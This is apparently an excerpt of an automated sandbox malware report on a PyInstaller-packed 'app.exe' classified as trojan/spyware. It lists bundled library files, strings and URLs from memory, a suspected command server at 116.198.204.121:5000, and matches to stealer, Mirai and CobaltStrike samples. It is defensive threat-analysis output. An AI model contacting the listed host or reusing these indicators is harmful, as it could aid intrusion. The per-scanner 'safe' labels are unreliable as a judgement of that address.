    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ecb.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_eksblowfish.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ocb.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ofb.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_BLAKE2b.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_BLAKE2s.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_MD2.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_MD4.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_MD5.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_RIPEMD160.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA1.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA224.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA256.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA384.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA512.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_ghash_clmul.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_ghash_portable.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_keccak.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_poly1305.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Math\_modexp.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Protocol\_scrypt.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_ec_ws.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_ed25519.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_ed448.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_x25519.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Util\_cpuid_c.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Util\_strxor.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\MSVCP140.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\VCRUNTIME140.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\VCRUNTIME140_1.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\_asyncio.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\_brotli.cp38-win_amd64.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\_bz2.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\_cffi_backend.cp38-win_amd64.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\_ctypes.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\_decimal.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\_elementtree.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\_hashlib.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\_lzma.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\_multiprocessing.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\_overlapped.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\_queue.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\_socket.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\_ssl.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\_win32sysloader.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-console-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-datetime-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-debug-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-errorhandling-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-file-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-file-l1-2-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-file-l2-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-handle-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-heap-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-interlocked-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-libraryloader-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-localization-l1-2-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-memory-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-namedpipe-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-processenvironment-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-processthreads-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-processthreads-l1-1-1.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-profile-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-rtlsupport-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-string-l1-1-0.dll | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-synch-l1-1-0.dll | 0% | ReversingLabs
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    https://dnspython.readthedocs.io). | 0% | Avira URL Cloud | safe
    https://python-jsonschema.readthedocs.io/en/stable/ | 0% | Avira URL Cloud | safe
    https://tidelift.com/subscription/pkg/pypi-jsonschema?utm_source=pypi-jsonschema&utm_medium=referral | 0% | Avira URL Cloud | safe
    https://results.pre-commit.ci/badge/github/python-jsonschema/jsonschema/main.svg | 0% | Avira URL Cloud | safe
    http://www.scipy.org/not/real/data.txt | 0% | Avira URL Cloud | safe
    http://timelessrepo.com/json-isnt-a-javascript-subset). | 0% | Avira URL Cloud | safe
    https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr& | 0% | Avira URL Cloud | safe
    https://dmlc.github.io/dlpack/latest/python_spec.html | 0% | Avira URL Cloud | safe
    https://personal.math.ubc.ca/~cbm/aands/page_379.htm | 0% | Avira URL Cloud | safe
    https://cryptography.io/en/latest/installation.html | 0% | Avira URL Cloud | safe
    http://cffi.readthedocs.org | 0% | Avira URL Cloud | safe
    http://116.198.204.121:5000/102019base0% | 0% | Avira URL Cloud | safe
    https://optimized-einsum.readthedocs.io/en/stable/ | 0% | Avira URL Cloud | safe
    https://python-jsonschema.readthedocs.io/en/latest/validate/#validating-formats | 0% | Avira URL Cloud | safe
    https://results.pre-commit.ci/latest/github/python-jsonschema/jsonschema/main | 0% | Avira URL Cloud | safe
    http://116.198.204.121:5000 | 0% | Avira URL Cloud | safe
    http://packages.python.org/altgraph | 0% | Avira URL Cloud | safe
    https://python-jsonschema.readthedocs.io/ | 0% | Avira URL Cloud | safe
    https://www.openblas.net/ | 0% | Avira URL Cloud | safe
    https://stat.ethz.ch/~stahel/lognormal/bioscience.pdf | 0% | Avira URL Cloud | safe
    https://cryptography.io/en/latest/security.html | 0% | Avira URL Cloud | safe
    No contacted domains info
    Name | Source | Malicious | Antivirus Detection | Reputation
                                                      high
                                                      https://github.com/sponsors/Julian/app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.itl.nist.gov/div898/software/dataplot/refman2/auxillar/powpdf.pdfapp.exe, 00000000.00000003.2068528399.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpfalse
                                                          high
                                                          https://dnspython.readthedocs.io).app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://httpbin.org/app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.apache.org/licenses/app.exe, 00000000.00000003.2074628570.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=mainapp.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://numpy.org/doc/stable/reference/random/index.htmlapp.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3282611585.0000020839C50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.pcg-random.org/posts/developing-a-seed_seq-alternative.htmlapp.exe, 00000000.00000003.2068383589.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3290322040.00007FF8B7816000.00000002.00000001.01000000.0000001A.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://metacpan.org/pod/distribution/Math-Cephes/lib/Math/Cephes.pod#i0:-Modified-Bessel-function-oapp.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/numpy/numpy/issues/4763app.exe, 00000002.00000002.3282483977.0000020839B80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://img.shields.io/badge/skeleton-2024-informationalapp.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535app.exe, 00000002.00000002.3279130529.0000020833952000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://groups.google.com/forum/#app.exe, 00000000.00000003.2074056196.000002225456B000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drfalse
                                                                              high
                                                                              http://mathworld.wolfram.com/CauchyDistribution.htmlapp.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpfalse
                                                                                high
                                                                                https://github.com/boppreh/keyboard#api)app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cryptography.io/en/latest/installation.htmlapp.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://github.com/ronaldoussoren/altgraph/workflows/Lint/badge.svgapp.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                      high
                                                                                      http://tools.ietf.org/html/rfc6125#section-6.4.3app.exe, 00000002.00000002.3283019914.0000020839F10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://timelessrepo.com/json-isnt-a-javascript-subset).app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://github.com/rthalley/dnspython/actions/workflows/python-package.yml/badge.svg)app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://116.198.204.121:5000app.exe, 00000002.00000002.3284661842.000002083AD20000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278039696.0000020832E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://google.com/mailapp.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://img.shields.io/pypi/v/importlib_metadata.svgapp.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://results.pre-commit.ci/latest/github/python-jsonschema/jsonschema/mainapp.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://github.com/jaraco/jaraco.functools/issues/5app.exe, 00000002.00000002.3278412088.00000208331F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://cffi.readthedocs.orgapp.exe, 00000000.00000003.2074056196.000002225456B000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.rfc-editor.org/info/rfc7253app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://116.198.204.121:5000/102019base0%app.exe, 00000002.00000002.3284691267.000002083ADD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://github.com/pyca/cryptography/issuesapp.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://web.archive.org/web/20080221202153/https://www.math.hmc.edu/~benjamin/papers/CombTrig.pdfapp.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://python-jsonschema.readthedocs.io/en/latest/validate/#validating-formatsapp.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.app.exe, 00000002.00000002.3278071149.0000020833029000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2092269988.0000020833029000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://html4/loose.dtdapp.exe, 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpfalse
                                                                                                          high
                                                                                                          https://github.com/ronaldoussoren/altgraphapp.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                            high
                                                                                                            https://github.com/rthalley/dnspython.gitapp.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://mahler:8092/site-updates.pyapp.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://github.com/python-jsonschema/jsonschema/issues/app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://optimized-einsum.readthedocs.io/en/stable/app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://cryptography.io/app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://github.com/ronaldoussoren/altgraph/issuesMETADATA.0.drfalse
                                                                                                                      high
                                                                                                                      https://zenodo.org/badge/3072629.svgapp.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://python-jsonschema.readthedocs.io/app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://packages.python.org/altgraphapp.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://.cssapp.exe, 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.google.com/index.htmlapp.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://pypi.python.org/pypi/keyboard/):app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://github.com/python/cpython/blob/3.7/Objects/listsort.txtapp.exe, 00000002.00000002.3279130529.00000208335A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://pracrand.sourceforge.net/RNG_engines.txtapp.exe, 00000000.00000003.2068294593.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.00000208335A0000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291567385.00007FF8B8CB7000.00000002.00000001.01000000.00000020.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/pypa/packagingapih__app.exe, 00000002.00000002.3278811218.0000020833420000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://crl.thawte.com/ThawteTimestampingCA.crl0app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 
00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040994788.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://stat.ethz.ch/~stahel/lognormal/bioscience.pdfapp.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://cryptography.io/en/latest/changelog/app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://pypi.python.org/pypi/sphinxapp.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://mail.python.org/mailman/listinfo/cryptography-devapp.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://tools.ietf.org/html/rfc6455#section-5.2app.exe, 00000002.00000002.3278244921.00000208330C0000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279032842.0000020833520000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://codecov.io/github/pyca/cryptography?branch=mainapp.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
IP:116.198.204.121
Domain:unknown
Country:China
ASN:137699
ASN Name:CHINATELECOM-JIANGSU-SUQIAN-IDCCHINATELECOMJiangsuSuqian
Malicious:false
                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                  Analysis ID:1554551
                                                                                                                                                                  Start date and time:2024-11-12 16:49:09 +01:00
                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                  Overall analysis duration:0h 8m 50s
                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                  Report type:full
                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                  Number of analysed new started processes analysed:5
                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                  Technologies:
                                                                                                                                                                  • HCA enabled
                                                                                                                                                                  • EGA enabled
                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                  Sample name:app.exe
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal56.troj.spyw.winEXE@3/196@0/1
                                                                                                                                                                  EGA Information:
                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                  HCA Information:
                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                  • Number of executed functions: 57
                                                                                                                                                                  • Number of non-executed functions: 279
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                  • VT rate limit hit for: app.exe
                                                                                                                                                                  No simulations
                                                                                                                                                                  No context
                                                                                                                                                                  No context
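Match:CHINATELECOM-JIANGSU-SUQIAN-IDCCHINATELECOMJiangsuSuqian
• Associated Sample Name / URL: mips.nn.elf; Detection: malicious; Threat Name: Mirai, Okiru; Context: 116.198.200.237
• Associated Sample Name / URL: TEiot52yrz.exe; Detection: malicious; Threat Name: CobaltStrike, Metasploit; Context: 116.198.231.169
• Associated Sample Name / URL: 2PSj0qX4W6.exe; Detection: malicious; Threat Name: CobaltStrike, Metasploit; Context: 116.198.231.169
• Associated Sample Name / URL: LtmV2sDcTK.exe; Detection: malicious; Threat Name: CobaltStrike, Metasploit; Context: 116.198.231.169
• Associated Sample Name / URL: QT2hJT3Syn.exe; Detection: malicious; Threat Name: CobaltStrike, Metasploit; Context: 116.198.231.169
• Associated Sample Name / URL: TEiot52yrz.exe; Detection: malicious; Threat Name: CobaltStrike, Metasploit; Context: 116.198.231.169
• Associated Sample Name / URL: 2PSj0qX4W6.exe; Detection: malicious; Threat Name: CobaltStrike, Metasploit; Context: 116.198.231.169
• Associated Sample Name / URL: LtmV2sDcTK.exe; Detection: malicious; Threat Name: CobaltStrike, Metasploit; Context: 116.198.231.169
• Associated Sample Name / URL: QT2hJT3Syn.exe; Detection: malicious; Threat Name: CobaltStrike, Metasploit; Context: 116.198.231.169
• Associated Sample Name / URL: gOEF4WOJ3c.elf; Detection: malicious; Threat Name: Unknown; Context: 116.198.238.210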
                                                                                                                                                                  No context
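Match:C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_ARC4.pyd
• Associated Sample Name / URL: 231210-10-Creal-33652f.exe; Detection: malicious; Threat Name: Creal Stealer
• Associated Sample Name / URL: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe; Detection: malicious; Threat Name: Unknown
• Associated Sample Name / URL: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe; Detection: malicious; Threat Name: Unknown
• Associated Sample Name / URL: dll.dll.0.dll; Detection: malicious; Threat Name: Unknown
• Associated Sample Name / URL: dll.dll.0.dll; Detection: malicious; Threat Name: Unknown
• Associated Sample Name / URL: explorer.exe.0.exe; Detection: malicious; Threat Name: Unknown
• Associated Sample Name / URL: 00#U2800.exe; Detection: malicious; Threat Name: Unknown
• Associated Sample Name / URL: prank.exe; Detection: malicious; Threat Name: Discord Token Stealer
• Associated Sample Name / URL: SecuriteInfo.com.FileRepMalware.5539.23420.exe; Detection: malicious; Threat Name: Unknown
• Associated Sample Name / URL: SecuriteInfo.com.FileRepMalware.5539.23420.exe; Detection: malicious; Threat Name: Unknown
Match:C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_Salsa20.pyd
• Associated Sample Name / URL: 231210-10-Creal-33652f.exe; Detection: malicious; Threat Name: Creal Stealer
• Associated Sample Name / URL: SecuriteInfo.com.Win64.Evo-gen.30371.21664.exe; Detection: malicious; Threat Name: Akira Stealer
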